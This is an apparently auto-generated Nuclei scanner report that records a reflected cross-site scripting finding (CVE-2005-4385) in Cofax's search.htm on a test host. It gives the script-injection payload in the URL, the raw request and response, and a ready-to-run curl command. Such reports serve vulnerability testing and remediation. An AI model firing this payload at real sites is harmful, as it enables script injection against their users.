Cofax <=2.0RC3 - Cross-Site Scripting (CVE-2005-4385) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2005-4385 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/search.htm?searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024

Template Information

Key	Value
Name	Cofax <=2.0RC3 - Cross-Site Scripting
Authors	geeknik
Tags	cve2005, cve, cofax, xss
Severity	medium
Description	Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
Remediation	Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor.
CVSS-Metrics	CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
CVE-ID	CVE-2005-4385
CVSS-Score	4.30
vendor	cofax
product	cofax

Request

GET /search.htm?searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 350
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT

GET /search.htm?searchstring2&searchstring='>"</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54

References:

• http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
• https://nvd.nist.gov/vuln/detail/CVE-2005-4385
• http://www.vupen.com/english/advisories/2005/2977
• https://github.com/ARPSyndicate/kenzer-templates

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54' 'https://honey.scanme.sh/search.htm?searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

---

Generated by Nuclei v3.2.5